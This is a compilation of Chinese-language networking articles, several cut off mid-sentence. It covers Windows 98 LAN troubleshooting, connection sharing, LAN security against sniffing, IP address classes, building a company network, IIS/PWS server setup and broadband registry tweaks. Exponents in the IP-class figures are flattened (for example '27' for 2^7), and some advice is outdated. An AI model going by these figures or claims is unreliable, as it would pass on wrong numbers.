-
局域网常见故障十五问
1、为什么Windows 98网上邻居中找不到域及服务器,但可找到其他的工作站?
解答:
在"控制面板→网络→Microsoft网络客户"中,将登录时Windows 98与网络的连接由慢速改为快速连接。
2、为什么在查看"网上邻居"时,会出现 "无法浏览网络。网络不可访问。想得到更多信息,请查看’帮助索引’中的’网络疑难解答’专题。"的错误提示?
解答:
(1)在Windows启动后,要求输入Microsoft网络用户登录口令时,点了"取消"按钮所造成的,如果是要登录NT服务器,必须以合法的用户登录,并且输入正确口令。
(2)与其它的硬件起冲突。打开"控制面板→系统→设备管理"。查看硬件的前面是否有黄色的问号、感叹号或者红色的问号。如果有,必须手工更改这些设备的中断和I/O地址设置。
3、为什么在"网上邻居"或"资源管理器"中只能找到本机的机器名?
解答:
网络通信错误,一般是网线断路或者与网卡的接确不良,还有可能是Hub有问题。
4、为什么可以访问服务器,也可以访问Internet,但却无法访问其他工作站?
解答:
(1)如果使用了WINS解析,可能是WINS服务器地址设置不当。
(2)检查网关设置,若双方分属不同的子网而网关设置有误,则不能看到其他工作站。
(3)检查子网掩码设置。
5、为什么网卡安装不上?
解答:
(1)计算机上安装了过多其它类型的接口卡,造成中断和I/O地址冲突。可以先将其他不重要的卡拿下来,再安装网卡,最后再安装其他接口卡。
(2)计算机中有一些安装不正确的设备,或有"未知设备"一项,使系统不能检测网卡。这时应该删除"未知设备"中的所有项目,然后重新启动计算机。
(3)计算机不能识别这一种类型的网卡,一般只能更换网卡。
6、为什么可以Ping通IP地址,但Ping不通域名?
解答:
TCP/IP协议中的"DNS设置"不正确,请检查其中的配置。对于对等网,"主机"应该填自己机器本身的名字,"域"不需填写,DNS服务器应该填自己的IP。对于服务器/工作站网,"主机"应该填服务器的名字,"域"填局域网服务器设置的域,DNS服务器应该填服务器的IP。
7、为什么网络上的其他计算机无法与我的计算机连接?
解答:
(1)确认是否安装了该网络使用的网络协议?如果要登录NT域,还必须安装NetBEUI协议。
(2)是否安装并启用了文件和打印共享服务?
(3)如果是要登录NT服务器网络,在"网络"属性的"主网络登录"中,应该选择"Microsoft网络用户"。
(4)如果是要登录NT服务器网络,在"网络"属性框的"配置"选项卡中,双击列表中的"Microsoft网络用户"组件,检查是否已选中"登录到Windows域"复选框,以及"Windows域"下的域名是否正确。
8、为什么安装网卡后,计算机启动的速度慢了很多?
解答:
可能在TCP/IP设置中设置了"自动获取IP地址",这样每次启动计算机时,计算机都会主动搜索当前网络中的DHCP服务器,所以计算机启动的速度会大大降低。
解决的方法是"指定IP地址"。
9、为什么在网络邻居中看不到任何计算机?
解答:
主要原因可能是网卡的驱动程序工作不正常。请检查网卡的驱动程序,必要时重新安装驱动程序。
10、为什么能够看到别人的机器,但不能读取别人电脑上的数据?
解答:
(1)首先必须设置好资源共享。选择"网络→配置→文件及打印共享",将两个选项全部打勾并确定,安装成功后在"配置"中会出现"Microsoft 网络上的文件与打印机共享"选项。
(2)检查所安装的所有协议中,是否绑定了"Microsoft网络上的文件与打印机共享"。选择"配置"中的协议如"TCP/IP协议",点击"属性"按钮,确保绑定中"Microsoft网络上的文件与打印机共享"、"Microsoft网络用户"前已经打勾了。
11、为什么在安装网卡后通过"控制面板→系统→设备管理器"查看时,报告"可能没有该设备,也可能此设备未正常运行,或是没有安装此设备的所有驱动程序"的错误信息?
解答:
(1)没有安装正确的驱动程序,或者驱动程序版本不对。
(2)中断号与I/O地址没有设置好。有一些网卡通过跳线开关设置;另外一些是通过随卡带的软盘中的Setup程序进行设置。
12、为什么已经安装了网卡和各种网络通讯协议,但"文件及打印共享"是虚的,无法选择?
解答:
原因是没有安装"Microsoft 网络上的文件与打印共享"组件。在"网络"属性窗口的"配置"标签里,单击"添加"按钮,在"请选择网络组件"窗口单击"服务",单击"添加"按钮,在"选择网络服务"的左边窗口选择"Microsoft",在右边窗口选择"Microsoft网络上的文件与打印机共享",单击"确定"按钮,系统可能会要求插入Windows安装光盘,重新启动系统即可。
13、为什么无法在网络上共享文件和打印机?
解答:
(1)确认是否安装了文件和打印机共享服务组件。要共享本机上的文件或打印机,必须安装"Microsoft网络上的文件与打印机共享"服务。
(2)确认是否已经启用了文件或打印机共享服务。在"网络"属性框中选择"配置"选项卡,单击"文件与打印机共享"按钮,然后选择"允许其他用户访问的我的文件"和"允许其他计算机使用我的打印机"选项。
-
你知道网吧靠什么赚钱吗?一条上网线路,一份上网费用,就能让整个网吧内的所有计算机均连入互联网!难怪在有的地方,去网吧上网甚至比在家里上还便宜。如果你家中(或公司里)有多台计算机,何不学学自己来建立这么一个上网服务器呢?
一、接入互联网的条件
万丈高楼也要从地起,想连通因特网,一些必要的软硬件设备是一定需要的。这些设备一般包括:
1.找一家ISP。ISP(Internet Service Provider)的意思是Internet服务提供商。你的家庭网必须租用ISP(一般为中国电信)提供的线路,方可以连接到因特网上。
2.上网的帐号和密码。世上没有免费的午餐,你享受了ISP的因特网接入服务,就得向它支付相应的费用,这个帐号当然就是用来和你“算帐”的,而密码呢,自然是保护你的帐号不要被其他人所盗用,否则别人上网你给钱,岂不当了冤大头了!
3.上网的电话号码。你的ISP提供给你上网用的帐号和密码的同时,还会给你一个特殊的电话号码(比如163)。拨此号码就可以首先连上你的ISP,再由它建立一个你和因特网之间的连接。
4.一条电话线。要拨电话号码,当然需要电话线啦!
5.一台Modem(调制解调器)。它分内置和外置两种,内置的又叫“传真卡”,是一张卡型,外置的则在这张卡外面套了一个盒子;一般人都采用内置的Modem,因为它更便宜。Modem又因其发音而有“猫”的爱称,它是连接计算机和电话线之间的一座桥梁,用于数字信号(计算机)和模拟信号(电话线)的转换。
二、建立上网服务器
如果你所有的计算机都已经组建好了一个对等网,则在你所选择的上网服务器(一般是最好的那台计算机)上安装好Modem,再装上Internet连接共享,经过适当的设置之后,就可以让你的整个家庭网络用一条电话线、一个帐号、一个Modem连接入因特网,一个你喜欢的家庭网吧就将如此诞生!
1.Modem的安装
本文以使用得最多的内置Modem(传真卡)为例。首先打开服务器的主机箱盖,将你的内猫插到主板上任意一个空闲的合适插槽(ISA对ISA,PCI对PCI)中去,用螺丝固定好,盖上主机箱盖;再把你的电话线,插入到内猫的“Line”口中、电话机插到“Phone”口中就一切OK了!
然后把服务器电源打开,当进入Win98之后,系统将会自动寻找到你新安装的内猫,将驱动程序盘准备好,根据提示进行安装即可。
当Modem连接好,驱动程序安装完之后,还得测试一下是否安装且运行正常。请依次进入“我的电脑→控制面板→调制解调器→诊断→详细信息”,如果有看到下方列表中有命令和相应,一般就说明Modem安装和运行无误。
2.拨号上网的设置
接着建立一个拨号网络连接。选“我的电脑→拨号网络”,双击里面的“建立新连接”图标,在“请键入对方计算机名称”处输入任意连接名,“选择设备”处确保为已安装成功的那个Modem;再输入本地区号和ISP提供的因特网连接电话号码即可。
3.拨号上网的测试
双击所建立好的连接,输入相应的用户名和密码,再按“连接”按钮,在一阵嚣叫后,等用户名和密码验证成功,此连接窗口即会自动缩到任务栏右下角,变成两台小电脑的图标,这就说明已经拨号成功!
打开浏览器,在地址栏输入你想要进的网站地址,再回车,即可成功进入;欲断开连接,只需双击任务栏右下角的小图标,再选“断开连接”即可。
说明:
对于这种普通拨号上网来说,上网所花费用,唯一计算标准就是时间!一般是以分钟为单位。目前有三种计费方式:1.包月制,即每月固定多少费用,你多上少上都交一些多的钱;2.捆绑制,即以每分钟为计费单位,包括上网所需的所有费用;3.分离制,即分上网通信费和网络使用费两种,前者即电话费,以三分钟为一个计费单位,后者为网络使用费,以每分钟为一个计费单位。现在国内以“捆绑制”最为流行。
4.Internet连接共享的安装
在使用Win95/WinNT的年代,要想让整个家庭网都能通过一线一猫一帐号上网,需得要安装第三方软件,比如Wingate、Sygate等;不过从Win98开始,到WinME/Win2000/WinXP,都有自带一个ICS(Internet Connection Sharing,Internet连接共享),利用它使家庭网络共享上网,就简单得没法再简单了!
在家庭网的服务器上,进入“我的电脑”,再打开“添加/删除程序”,选“Windows安装程序”选项;双击“Internet工具”,把“Internet连接共享”勾选中即可;等文件完成后,将自动进入“Internet共享安装向导”,请按提示操作,除了某步需要选“取消”已跳过安装盘制作外,其他均选默认选项即可。
提醒:
Internet连接共享安装和配置完成之后,要根据提示重新启动计算机。
7.Internet连接共享的测试
该检验你工作的成效了!分别在服务器和任意一台工作站上,做在浏览器中访问站点、上QQ、进入因特网游戏对战等操作,(它们均和单台机器上网一样,不需要再做其他任何特殊的设置!)如果都使用正常的话,那么恭喜你成功了!
-
目前的局域网基本上都采用以广播为技术基础的以太网,任何两个节点之间的通信数据包,不仅为这两个节点的网卡所接收,也同时为处在同一以太网上的任何一个节点的网卡所截取。因此,黑客只要接入以太网上的任一节点进行侦听,就可以捕获发生在这个以太网上的所有数据包,对其进行解包分析,从而窃取关键信息,这就是以太网所固有的安全隐患。事实上,Internet上许多免费的黑客工具都把以太网侦听作为其最基本的手段。
局域网安全
当前,保证局域网安全的解决办法有以下几种:
1.网络分段
网络分段通常被认为是控制网络广播风暴的一种基本手段,但其实也是保证网络安全的一项重要措施。其目的就是将非法用户与敏感的网络资源相互隔离,从而防止可能的非法侦听,网络分段可分为物理分段和逻辑分段两种方式。
目前,一般的局域网大多采用以交换机为中心、路由器为边界的网络格局,应重点挖掘中心交换机的访问控制功能和三层交换功能,综合应用物理分段与逻辑分段两种方法,来实现对局域网的安全控制。例如:普遍使用的DEC MultiSwitch 900的入侵检测功能,其实就是一种基于MAC地址的访问控制,也就是上述的基于数据链路层的物理分段。
2.以交换式集线器代替共享式集线器
对局域网的中心交换机进行网络分段后,以太网侦听的危险仍然存在。这是因为网络最终用户的接入往往是通过分支集线器而不是中心交换机,而使用最广泛的分支集线器通常是共享式集线器。这样,当用户与主机进行数据通信时,两台机器之间的数据包(称为单播包Unicast Packet)还是会被同一台集线器上的其他用户所侦听。一种很危险的情况是:用户TELNET到一台主机上,由于TELNET程序本身缺乏加密功能,用户所键入的每一个字符(包括用户名、密码等重要信息),都将被明文发送,这就给黑客提供了机会。
因此,应该以交换式集线器代替共享式集线器,使单播包仅在两个节点之间传送,从而防止非法侦听。当然,交换式集线器只能控制单播包而无法控制广播包(Broadcast Packet)和多播包(Multicast Packet)。所幸的是,广播包和多播包内的关键信息,要远远少于单播包。
3.VLAN的划分
为了克服以太网的广播问题,除了上述方法外,还可以运用VLAN(虚拟局域网)技术,将以太网通信变为点到点通信,防止大部分基于网络侦听的入侵。
目前的VLAN技术主要有三种:基于交换机端口的VLAN、基于节点MAC地址的VLAN和基于应用协议的VLAN。基于端口的VLAN虽然稍欠灵活,但却比较成熟,在实际应用中效果显著,广受欢迎。基于MAC地址的VLAN为移动计算提供了可能性,但同时也潜藏着遭受MAC欺诈攻击的隐患。而基于协议的VLAN,理论上非常理想,但实际应用却尚不成熟。
在集中式网络环境下,我们通常将中心的所有主机系统集中到一个VLAN里,在这个VLAN里不允许有任何用户节点,从而较好地保护敏感的主机资源。在分布式网络环境下,我们可以按机构或部门的设置来划分VLAN。各部门内部的所有服务器和用户节点都在各自的VLAN内,互不侵扰。
VLAN内部的连接采用交换实现,而VLAN与VLAN之间的连接则采用路由实现。目前,大多数的交换机(包括普遍采用的DEC MultiSwitch 900)都支持RIP和OSPF这两种国际标准的路由协议。如果有特殊需要,必须使用其他路由协议(如CISCO公司的EIGRP或支持DECnet的IS-IS),也可以用外接的多以太网口路由器来代替交换机,实现VLAN之间的路由功能。当然,这种情况下,路由转发的效率会有所下降。
无论是交换式集线器还是VLAN交换机,都是以交换技术为核心,它们在控制广播、防止黑客上相当有效,但同时也给一些基于广播原理的入侵监控技术和协议分析技术带来了麻烦。因此,如果局域网内存在这样的入侵监控设备或协议分析设备,就必须选用特殊的带有SPAN(SwitchPort Analyzer)功能的交换机。这种交换机允许系统管理员将全部或某些交换端口的数据包映射到指定的端口上,提供给接在这一端口上的入侵监控设备或协议分析设备。笔者在一次外部网设计中,就选用了Cisco公司的具备SPAN功能的Catalyst系列交换机,既得到了交换技术的好处,又使原有的Sniffer协议分析仪“英雄有用武之地”。
广域网安全
由于广域网大多采用公网来进行数据传输,信息在广域网上传输时被截取和利用的可能性就比局域网要大得多。如果没有专用的软件对数据进行控制,只要使用Internet上免费下载的“包检测”工具软件,就可以很容易地对通信数据进行截取和破译。
因此,必须采取手段,使得在广域网上发送和接收信息时能够保证:
①除了发送方和接收方外,其他人是无法知悉的(隐私性);
②传输过程中不被篡改(真实性);
③发送方能确知接收方不是假冒的(非伪装性);
④发送方不能否认自己的发送行为(不可抵赖性)。
为了达到以上安全目的,广域网通常采用以下安全解决办法:
1.加密技术
加密型网络安全技术的基本思想是不依赖于网络中数据通道的安全性来实现网络系统的安全,而是通过对网络数据的加密来保障网络的安全可靠性。数据加密技术可以分为三类,即对称型加密、 -
一、IP地址与网络分类
(1)IP地址
我们知道,不同的物理网络技术有不同的编址方式;不同物理网络中的主机,有不同的物理网络地址。网间网技术是将不同物理网络技术统一起来的高层软件技术。网间网技术采用一种全局通用的地址格式,为全网的每一网络和每一主机都分配一个网间网地址,以此屏蔽物理网络地址的差异。
IP协议提供一种全网间网通用的地址格式,并在统一管理下进行地址分配,保证一个地址对应一台网间网主机(包括网关),这样物理地址的差异被IP层所屏蔽。IP层所用到的地址叫做网间网地址,又叫IP地址。它由网络号和主机号两部分组成,统一网络内的所有主机使用相同的网络号,主机号是唯一的。
IP地址是一个32为的二进制数,分成4个字段,每个字段8位。
(2)三类主要的网络地址
我们知道,从LAN到WAN,不同种类网络规模相差很大,必须区别对待。因此按网络规模大小,将网络地址分为主要的三类,如下:
A类:
0 1 2 3 8 16 24
3 1 0网络号主机号
B类:
1 0网络号主机号
C类:
1 1 0网络号主机号
A类地址用于少量的(最多27个)主机数大于216的大型网,每个A类网络可容纳最多224台主机;B类地址用于主机数介于28~216之间数量不多不少的中型网,B类网络最多214个;C类地址用于每个网络只能容纳28台主机的大量小型网,C类网络最多221个。
除了以上A、B、C三个主类地址外,还有另外两类地址,如下:
D类:
1 1 1 0多目地址
E类:
1 1 1 1 0留待后用
其中多目地址(multicast address)是比广播地址稍弱的多点传送地址,用于支持多目传输技术。E类地址用于将来的扩展之用。
(3)TCP/IP规定网络地址
除了一般地标识一台主机外,还有几种具有特殊意义的特殊形式。
*广播地址
TCP/IP规定,主机号全为“1”的网络地址用于广播之用,叫做广播地址。所谓广播,指同时向网上所有主机发送报文。
*有限广播
前面提到的广播地址包含一个有效的网络号和主机号,技术上称为直接广播(directed boradcasting)地址。在网间网上的任何一点均可向其他任何网络进行直接广播,但直接广播有一个缺点,就是要知道信宿网络的网络号。
有时需要在本网络内部广播,但又不知道本网络网络号。TCP/IP规定,32比特全为“1”的网间网地址用于本网广播,该地址叫做有限广播地址(limited broadcast address)。
*“0”地址
TCP/IP协议规定,各位全为“0”的网络号被解释成“本”网络。
*回送地址
A类网络地址127是一个保留地址,用于网络软件测试以及本地机进程间通信,叫做回送地址(loopback address)。无论什么程序,一旦使用回送地址发送数据,协议软件立即返回之,不进行任何网络
传输。
TCP/IP协议规定,一、含网络号127的分组不能出现在任何网络上;二、主机和网关不能为该地址广播任何寻径信息。由以上规定可以看出,主机号全“0”全“1”的地址在TCP/IP协议中有特殊含义,不能用作一台主机的有效地址。
二、子网掩码
(1)子网TCP/IP网间网技术产生于大型主流机环境中,它能发展到今天的规模是当初的设计者们始料未及的。网间网规模的迅速扩展对IP地址模式的威胁并不是它不能保证主机地址的唯一性,而是会带来两方面的负担:第一,巨大的网络地址管理开销;第二,网关寻径急剧膨胀。其中第二点尤为突出,寻径表的膨胀不仅会降低网关寻径效率(甚至可能使寻径表溢出,从而造成寻径故障),更重要的是将增加内外部路径刷新时的开销,从而加重网络负担。
因此,迫切需要寻求新的技术,以应付网间网规模增长带来的问题。仔细分析发现,网间网规模的增长在内部主要表现为网络地址的增减,因此解决问题的思路集中在:如何减少网络地址。于是IP网络
地址的多重复用技术应运而生。通过复用技术,使若干物理网络共享同一IP网络地址,无疑将减
少网络地址数。
子网编址(subnet addressing)技术,又叫子网寻径(subnet routing),英文简称subnetting,是最广泛使用的IP网络地址复用方式,目前已经标准化,并成为IP地址模式的一部分。
一般的,32位的IP地址分为两部分,即网络号和主机号,我们分别把他们叫做IP地址的“网间网部分”和“本地部分”。子网编址技术将本地部分进一步划分为“物理网络”部分和“主机”部分,如图:
网间网部分物理网络主机
|←网间网部分→|←────本地部分─────→|
其中“物理网络”用于标识同一IP网络地址下的不同物理网络,既是“子网”。
(2)子网掩码IP协议标准规定:每一个使用子网的网点都选择一个32位的位模式,若位模式中的某位置1,则对应IP地址中的某位为网络地址(包括网间网部分和物理网络号)中的一位;若位模式中的
某位置0,则对应IP地址中的某位为主机地址中的一位。例如位模式:
11111111 11111111 11111111 00000000中,前三个字节全1,代表对应IP地址中最高的三个字节为网络地址;后一个字节全0,代表对应IP地址中最后的一个字节为主机地址。这种位模式叫做子网模 -
说不定哪天‘头’拍拍你的肩膀,对你说:“小伙子,能力不错,现在有个重要任务交给你:你负责建立公司的局域网吧!”,你的感觉怎样,是两眼发黑,还是欣喜若狂。
嘿,我最近刚刚完成本公司的小小局域网,这个前前后后拖了半年的工程总算告一个段落。想不想知道我是如何做的?
首先自我介绍一下:本人在大学学的是自动控制,对电脑算精通,但从未组建过任何网络。大家可以给我写信 :-)
公司要建立局域网
公司有三栋建筑,在这里,称之为 1 号楼,2 号楼,3 号楼。
一号楼:三层,公司主要的办公楼,销售部,财务部,行政部,服务部等等皆集中 3 楼,但计算机并不多,约有 20 台 PC 机。目前需要连网的仅有 10 台。
二号楼:二层,研发部,有 19 台 PC 和一台 Sun 工作站。全部需要连网。
三号楼:二层,生产部,目前只有1台PC。
任何单位兴建一个网络都是有一定的需求的,要求使用网络能完成一定的工作,在满足应用的前提下,适当留有余量。同样,公司建立网络是为公司管理系统修路。考虑到日后的发展,我们用的是 100M 快速以太网,这年头这玩意最流行。从带宽上看,100M 远远超过了应用的需求。不过谁也不敢保证 3 年后 Microsoft 要求多高的带宽。也没有必要追求高性能而配置 1000M 的网络,因为这样不经济(当时,1000M 网络标准并未确定)。
网络设备选型
不同的网络设备的价格相差甚大,首先让我们来简单了解一下网络设备。
HUB:也就是所谓的集线器,它又可分为好几种,有普通 HUB,堆式 HUB,端口交换式 HUB 等等。100M 的 HUB 的带宽是共享的,也就是说,24口 的 HUB 的 24 口共享 100M 带宽,如果 24 口同时传数据,那么每个口的带宽就只有大约 10M。堆式 HUB 是一种可以堆叠的 HUB,也就是说,如果我们需要将 48 台机器联网,我们可以用 2 台堆式 HUB 堆叠起来当作一个 48 口的 HUB。
交换机:可以认为是一种高性能的 HUB,它的 100M 带宽是独立的,或者说它允许几个端口同时以 100M 的速度传递数据。交换机通常还带有路由功能。
网络中心是公司网络的核心,为避免可能的网络上的碰撞,我们的核心设备选用的是 Bay 公司的 350T 型交换机,它自适应 10/100M 网络,带有路由功能,总体性能不错。所有的 HUB 都直接与交换机相连,重要的服务器也直接接在交换机上,这样可以充分发挥交换机速度快,带宽高的优点。
我们选用的 HUB 是 Intel 公司的 Express 100TX-BASE 堆式 HUB (Intel 可不甘于仅仅只做 CPU,它还做网卡、显卡,说不定哪天它会做机箱呢。:-),它有 24 个口,可堆叠使用。使用 Bay 公司的技术制造,性价比不错。
注意:该 HUB 的第 1 个口的左边有一个小按键,按下它则第 1 口的 1、2 与 3、6 交叉,该口就是专用于 HUB 与 HUB 或交换机相联的一个端口。事实上,我公司的堆式 HUB 就是这样与交换机相连的。
网卡:每台电脑都需要一块网卡,我们初期选用的是 3Com 公司的 3C905,10/100 自适应网卡,也买过几块 Intel 的 82557,使用一段时间后,有块 Intel 的网卡就坏了,比较而言,3Com 的网卡质量要好过 Intel 的网卡。后来我们使用的是 D-Link 公司的 DFE-500TX 网卡,性价比相当不错。
网络布线系统:选用 AMP 公司的五类布线系统。在制作网线时要注意,不是简单的将 RJ-45 的 8 根线一一接通就可以了,必须保证 1、2 双绞,3,6 双绞,4、5 双绞,7、8 双绞,如果仅仅是一一对应接通而不是保证 1、2 双绞,3、6 双绞的话,可能引起网线较长的的站点工作不稳定,甚至无法正常工作。
在我们的网络设计中,我发现了一个难点:从 2 号楼的网络中心到 1 号楼 3 楼的 HUB 处网线长度超过了 110,超出了 5 类线的最大距离 (100 米)。最初我想在两栋楼的中间做一个井,在井里放一台 HUB 作中继,但这样施工麻烦,可靠性难以保证。无意中我了解到了有一种超 5 类电缆,最大带宽可达 345 M,当用于100M系统时,最大距离为 145m,这就正好解决了我们的难题。
下面是我对市面上的两种超五类电缆的测试情况。
距离 (m) AMP Belden
305m no no
170m no 未测
130m OK 未测
146m 未测 OK
160m 不稳定 不稳定
※ 不稳定:测试是将一个 Hub 与交换机相连时,插在交换机的 5、6、7 口时不通,但第 8 口都通。
从以上结果看,超五类实际指标最大为 150m,超过 150m 将不能正常工作。
网络配置、施工
服务器设置:局域网上共 2 台服务器,其中 1 台用做内部文件服务器。另一台用做 Internet 服务器。Internet 服务器运行 Windows NT + IIS + Exchange Server,提供 WWW、FTP、Email 服务。
施工:计算网线长度时要注意预留 10% 的余量,避免万一由于建筑物的结构原因必须的绕道和其他难以预料的情况。
一个综合布线系统与其说是计算机工程不如说是建筑工程,实际的性能与安装工艺有很大关系,施工时要注意网线不能承受曲率过大的 -
看到别人精美的个人主页,你一定会有所心动,而如今免费资源却是越来越少,往往你花大量时间去寻找免费主页空间时,最后却因它们的不稳定而给自己带来一些遗憾。此外,在信息社会中,我们经常需要转移、暂存一些文档和资料,或与别人实现文件共享,FTP服务会经常作为我们的最佳信息传输方式。但在很多时候,当我们来回穿梭于那些免费的FTP服务器时,却因为苦于没有匿名帐号或人数过多而不能正常登录。其实,我们完全可以避开这些尴尬,全力打造一个属于自己的个人服务器,从此不再搭便车,开始体会拥有的快感!下面随我一起开始个人服务器的网络架设之旅。
WWW服务器的架设
我们几乎每天都会浏览形形色色的网站来获取各种各样的信息,WWW服务器就是提供此类服务的,目前有很多信息提供商提供WWW服务器架设的付费服务。其实,我们完全可以自己打造WWW的个人服务器,在网上发布一些个人信息,并且体会做管理员的乐趣。WWW服务器的架设有很多种方式,下面介绍一些主流的实现方法:
1.通过微软提供的IIS
目前很大一部分的WWW服务器都架设在微软公司的IIS之上。它使用的环境为WinNT/2000/XP+Internet Information Service(IIS),相信很多用户现在使用的都是Win2000或WinXP系统,在Win2000 Professional和WinXP系统中,默认的情况下,它们在系统初始安装时都不会安装IIS(目前版本为IIS5.0),因此得将这些组件添加到系统中去。
第一步:IIS的安装
A.在控制面板中选择“添加/删除程序”,在出现的对话框中选择“添加/删除Windows组件”(如图1)。
B.在出现的复选框中选择安装Internet信息服务(IIS)(如图2),这一组件约需19MB的空间。
C.点击“下一步”,并将Win2000安装光盘放入光驱,安装程序即可将程序文件复制到硬盘中,点击“结束”即可完成。
第二步:IIS中Web服务器的基本配置
IIS中Web服务器的基本配置主要包括如下几部分:
A.打开IIS服务器的配置窗口,选择“开始”→“程序”→“管理工具”→“Internet服务管理器”,或者“选择”→“控制面板”→“管理工具”→“Internet服务管理器”也可,打开的窗口如图3。
B.在打开的窗口中鼠标右击“默认Web站点”,选择“属性”菜单。
C.在出现的“默认Web站点属性”窗口中,选择“主目录”标签,用以设置Web内容在硬盘中的位置,默认目录为“C:\Inetpub\Wwwroot”,你可根据需要自己设置(如图4)。
D.在属性窗口处选择“文档”标签,设置自己默认的首页网页名称,例如“Myfirstweb.htm”,将其添加并移动到列表的最顶端(如图5)。
E.确认默认的Web站点是否已经启动,如果没有可以鼠标右键点击“默认Web站点”,选择“启动”,在打开的IE地址栏中键入本机的IP地址,即可看到自己指定的主页已经开始在Internet上发布了。
这里只是介绍IIS最基本的设置选项,大家还可以按照需要去具体设置上面提到的“默认Web站点属性”,通过它来配置IIS的安全和其他一些参数。
IIS虽然好用,但默认安装的情况下,它也有很多的安全漏洞,包括著名的Unicode漏洞和CGI漏洞,因此在IIS安装完成之后,建议继续在微软公司主页上下载安装它们提供的安全漏洞补丁SP1和SP2。此外,建议将磁盘的文件系统转换成NTFS格式,安装系统的分区可在系统安装候转换,也可在安装完系统以后用PQMagic等工具进行转换。
2、利用微软的PWS
PWS的全称是“Personal Web Server”,字面意思就是个人网页服务器,由微软公司提供,它主要适合于创建小型个人站点,它的配置和使用比较简单,但功能却很强大。跟IIS的区别是,PWS可以安装在Win9X/Me/NT/2000/XP系统中,因此对Win9X/Me系统来说尤其可贵。
第一步:PWS的安装
对Win9X/Me系统来说,在光驱里放入Win98安装光盘,进入光盘的Add-ons\Pws\目录,双击Setup.exe命令即可开始安装PWS,安装界面如图6所示。我们如果需要一些例如ASP等高级功能,还可选择自定义的安装模式,否则直接选择典型安装。组件安装完成之后,会出现如图7所示的选项来设置WWW服务目录,我们可以视实际情况来设定,建议以缺省目录来安装。最后选择“完成”并根据提示重新启动计算机后,就可在右下角任务栏看见PWS的图标(如图8)。
这时打开一个IE窗口,在地址栏中输入“http://localhost”、“http://127.0.0.1”或者“http://你的IP地址”,就可看到PWS的默认页面,表明PWS已经成功运行了。
对于Win2000/XP来说,PWS是作为IIS的一个组件安装的。如果你是Win9X/Me系统,没有安装PWS的光盘也不要紧,可以去http://img.cn99.com/cn99new/series/dyndns/pws.zip下载PWS的安装软件,安装步骤跟上面差不多。
第二步:PWS的配置
双击屏幕右下角的PWS图标,或在菜单中选择相应的程序组来启动“个人Web管理器”(如图9)。由管理器界面(图9是Win2000中IIS的PWS,因此只有3个选项)可以看出它包括5个部分,可分别管理不同的功能,利用PWS架设自己 -
我为了加快网络速度用了多少个软件 可是全都没用 根本不像这些软件所讲的神话那样 安装之后可以增加几%的速度 直到我发现这个网站 http://www.speedguide.net/ 你不用安装什么软件程序在你的计算机
我也用这个网站来修改微软Windows 操作系统的 registry ,或是修改 MTU 达到最佳化的设定
成功率达100% 国内不论用和信双向(速率6Mb/256Kb)Cable Internet / 东森双向Cable Internet 或是任何一家ADSL(速率1.5Mb) , 而且都有明显增加联机速度
但是我是推荐双向cable modem(非阳春型)的宽频网络 ,最好是下载能有超过1MB的宽频网络
如果是用ADSL下载不到1MB的或是双向cable modem阳春型(128kb/64kb)或是实用型 , (700kb/100kb)的就没什么用处
因为我相信你们现在大多数用ADSL 大部分的人下载的速度都是1MB以下 , 不是512KBPS就是786KBPS , 其实微软Windows操作系统的registry和MTU默认值下载的最大值都有1MB
如(98, Me) (Windows XP 有时候已帮你网络速度最佳化了)
所以在我实际的例子中 Windows 98, Me 加速的空间最大 , 但是你的ISP提供给你的速度下载不到1MB 你即使最佳化也没用
就像你最佳化后计算机的设定值变成你的计算机可以达到联机速度5000KBPS
你的ISP给你的下载最高速度是512KBPS或是786KBPS 你的联机速度也只能有512KBPS或是786KBPS
我要好好的郑重强力的和大家推荐一下 http://www.speedguide.net/
这个网站是美国很有名的更改微软Windows操作系统的registry和MTU的网站以达到各种速度的最佳化
教学做法如下
首先 你的计算机一定要有Winzip8.0以上版本的压缩软件
连到 http://www.speedguide.net/
第一步骤:Windows 98, Windows Me, Windows 2000, Windows XP皆适用
左上方--Broadband 选项--Downloads/Patches --点下去:
注!!!以下文件都很“小”
Windows 98 的需要的档案:
mtupatch98.zip
sguide_tweak_98_ME
sguide_tweak_98_ME_PPPoE
sg_webtweak_9x.zip
Windows Me 的需要的档案:
sguide_tweak_98_ME
sguide_tweak_98_ME_PPPoE
sg_webtweak_9x.zip
Windows 2000/XP 的需要的档案:
sguide_tweak_2k.zip
sguide_tweak_2k_pppoe.zip
sg_webtweak_2k.zip
以上的程序解压缩后
当扩展名是.reg 就用鼠标左键直接点它
当扩展名是.inf 请用鼠标右键点它 , 会出现下拉式的窗口 如果你是用Winzip中文版选 “安装” 如果你是用Winzip英文版选 “Install”
注意!!当你解压缩后同时发现 同时有扩展名是.reg的档案 也有扩展名是.inf的档案 切记只要执行扩展名是.reg的档案即可 , 不要去安装扩展名是.inf的档案还有其它的档案也不要碰它们
第二步骤 Windows 98, Windows Me, Windows 2000, Windows XP皆适用
请到 http://www.speedguide.net/ 主页去
看到左面Shortcuts一栏----TCP/IP Analyzer 点下去 分析你的网络一些设定值
查一下你的 Default Receive Window (RWIN) = 256960 , 有没有达到256960这个数值
如果没有 请按左面TCP/IP Analyzer 下的 TCP/IP Optimizer 点击进入新页面 下载上方第一个修正程序TCP Optimizer , 然后执行它
执行后 它会出来一个窗口 , 窗口上面显示你是哪种类型上网勾你上网的方式 选择你的宽带方式
窗口中间勾Modify All Network Adapters
窗口下面 勾Optimal settings 最后按 Apply changes
然后重新开机 再按TCP/IP Analyzer测试一下
应该Default Receive Window (RWIN) = 256960 的值会是256960(或接近)才对
(如果不是256960 这通常会出现在Windows 98里 应为它少一个程序
所以如果你的操作系统是Windows 98 请在第一步骤 相同网页的中间位置下载MS Vtcp.386 fix for Windows 98这个程序解压缩后执行 再重新开机)
第三个步骤 只适用于Windows XP
中文版 ,如下
“开始” 选 “运行” 键入 “gpedit.msc”
本机计算机原则—计算机配置---管理模板---网络---QoS数据包调度程序---限制可保留频宽---点击左边“属性”
勾选 “已启用”
频宽限制(%): 20 改为 0
“确定” 再重新开机
英文版如下
“start” click “Run” enter “gpedit.msc”
Local Computer Policy---Computer Configuration—Administrative Templates
---Network---QoS Packet Scheduler---Limit reservable bandwidth---setting
Make sure check box on “Enabled” is selected
Bandwidth limit (%)
“Apply” “OK” then restart computer
只要按照这三个步骤 , 包准你的网络联机速度 , 吓吓叫 , 但是我再重申一次这是适合宽频网络的最佳化 , 如果你是用拨接上网 , 那很抱歉不会有什么差别
如果你的ISP给你的下载速度没有超过1MB 基本上也没什么改变 所以不要期望太大 不过你可以试试看
特别说明:我并不是破解高手,但我照说明也成功了。
所以请一定按部就班,一步步操作。真的出了问题请再找高高手解答。区区是有心无力的。
